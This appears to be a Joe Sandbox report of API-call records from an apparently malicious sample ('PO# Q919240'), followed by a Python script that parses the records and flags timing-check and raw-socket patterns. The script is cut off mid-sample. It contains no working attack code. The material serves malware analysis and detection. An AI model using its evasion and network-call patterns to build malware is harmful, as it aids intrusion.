                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AsyncState$ClientCursorLongScreenWindow
                • String ID:
                • API String ID: 3539004672-0
                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                • Sleep.KERNEL32(0000000A), ref: 0047D455
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID:
                • API String ID: 327565842-0
                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                APIs
                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: PrivateProfile$SectionWrite$String
                • String ID:
                • API String ID: 2832842796-0
                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Enum$CloseDeleteOpen
                • String ID:
                • API String ID: 2095303065-0
                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                APIs
                • GetWindowRect.USER32(?,?), ref: 00436A24
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: RectWindow
                • String ID:
                • API String ID: 861336768-0
                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                APIs
                • SendMessageW.USER32 ref: 00449598
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                • _wcslen.LIBCMT ref: 0044960D
                • _wcslen.LIBCMT ref: 0044961A
                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$_wcspbrk
                • String ID:
                • API String ID: 1856069659-0
                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                APIs
                • GetCursorPos.USER32(?), ref: 004478E2
                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                • GetCursorPos.USER32(00000000), ref: 0044796A
                • TrackPopupMenuEx.USER32(00946440,00000000,00000000,?,?,00000000), ref: 00447991
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CursorMenuPopupTrack$Proc
                • String ID:
                • API String ID: 1300944170-0
                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                APIs
                • GetClientRect.USER32(?,?), ref: 004479CC
                • GetCursorPos.USER32(?), ref: 004479D7
                • ScreenToClient.USER32(?,?), ref: 004479F3
                • WindowFromPoint.USER32(?,?), ref: 00447A34
                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Client$CursorFromPointProcRectScreenWindow
                • String ID:
                • API String ID: 1822080540-0
                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                APIs
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClientPaintRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 659298297-0
                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                APIs
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                  • Part of subcall function 00440D98: SendMessageW.USER32(00941BC0,000000F1,00000000,00000000), ref: 00440E6E
                  • Part of subcall function 00440D98: SendMessageW.USER32(00941BC0,000000F1,00000001,00000000), ref: 00440E9A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$EnableMessageSend$LongShow
                • String ID:
                • API String ID: 142311417-0
                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                APIs
                • IsWindowVisible.USER32(?), ref: 00445879
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                • _wcslen.LIBCMT ref: 004458FB
                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                • String ID:
                • API String ID: 3087257052-0
                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                • String ID:
                • API String ID: 245547762-0
                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                APIs
                • DeleteObject.GDI32(00000000), ref: 004471D8
                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                • SelectObject.GDI32(?,00000000), ref: 00447228
                • BeginPath.GDI32(?), ref: 0044723D
                • SelectObject.GDI32(?,00000000), ref: 00447266
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Object$Select$BeginCreateDeletePath
                • String ID:
                • API String ID: 2338827641-0
                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                APIs
                • Sleep.KERNEL32(00000000), ref: 00434598
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                • Sleep.KERNEL32(00000000), ref: 004345D4
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
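The per-function records above all share one line format for API calls ("Name.MODULE(args), ref: ADDR", with indirect calls prefixed by "Part of subcall function ADDR:"), and a record ends at its Instruction Fuzzy Hash line. The following Python script is an added example for triaging such listings; it is not part of the Joe Sandbox report or its plugin. It parses records into structured calls, then flags records whose API set covers a rule, using the socket/connect record and the Sleep/QueryPerformanceCounter record from this page as its embedded sample input. The rule names and the two rules themselves are the editor's own choices, not report signatures.

```python
"""Parse Joe Sandbox per-function API records and flag suspicious call combinations."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed by "Part of subcall function ADDR:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The three Similarity fields we keep; the fuzzy-hash line also terminates a record.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|API String ID|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee address when the call is made from a sub-function


@dataclass
class FuncRecord:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""
    fuzzy_hash: str = ""

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}

    def direct_refs(self) -> list[int]:
        return [c.ref for c in self.calls if c.subcall_of is None]


def parse_records(text: str) -> list[FuncRecord]:
    """Walk the report text; each Instruction Fuzzy Hash line closes the current record."""
    records, cur = [], FuncRecord()
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a for a in m["args"].split(",") if a] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        if f["key"] == "API ID":
            cur.api_id = f["val"]
        elif f["key"] == "API String ID":
            cur.api_string_id = f["val"]
        else:
            cur.fuzzy_hash = f["val"]
            records.append(cur)
            cur = FuncRecord()
    return records


# Editor-defined rules: a rule fires when every listed API appears in one record.
RULES = {
    "timing-check (Sleep + QueryPerformanceCounter)": {"Sleep", "QueryPerformanceCounter"},
    "raw tcp connect (socket + connect)": {"socket", "connect"},
}


def flag_records(records: list[FuncRecord]) -> list[tuple[str, FuncRecord]]:
    """Return (rule name, record) pairs for every rule whose API set the record covers."""
    hits = []
    for rec in records:
        names = rec.api_names()
        for rule, apis in RULES.items():
            if apis <= names:
                hits.append((rule, rec))
    return hits


def summarize(text: str) -> list[str]:
    """Triage lines: rule, first direct call-site address, and the record's API ID."""
    return [f"{rule}: first ref 0x{rec.direct_refs()[0]:08X}, API ID {rec.api_id}"
            for rule, rec in flag_records(parse_records(text))]


# Constructed sample: the two records excerpted from this page (Memory Dump Source lines omitted).
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
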